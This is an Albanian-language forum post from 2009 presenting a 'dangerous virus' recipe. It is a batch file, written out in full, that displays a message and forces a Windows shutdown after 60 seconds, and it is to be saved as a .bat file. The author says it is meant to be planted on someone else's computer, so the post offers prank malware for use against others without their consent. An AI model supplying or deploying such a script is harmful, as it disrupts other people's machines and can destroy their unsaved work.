PortalForumCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 si te krijojm nje virus te rrezikshen thing (se po kujtoni se esht virus pulash hehe)

Shko poshtë 
AutoriMesazh
g-star
Administrator
Administrator
avatar

Male Numri i postimeve : 151
Age : 27
Registration date : 24/01/2009

MesazhTitulli: si te krijojm nje virus te rrezikshen thing (se po kujtoni se esht virus pulash hehe)   Sat Feb 14, 2009 7:37 am

1.Hapim Notepad
2.E Shkruajm Kete:

@echo
msg * System-Coder
shutdown -s -t 60 -c "System-Coder KHG"

3.Dhe E Ruajm SiTeDoni.bat

po menoj naj kujt ne kompjoter me ja ba jo ne te juvin se nuk qelet maklm nga (hacker-g/star)
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.cipcop.tk
 
si te krijojm nje virus te rrezikshen thing (se po kujtoni se esht virus pulash hehe)
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Stafi i Forumit :: Ndihme-
Kërce tek: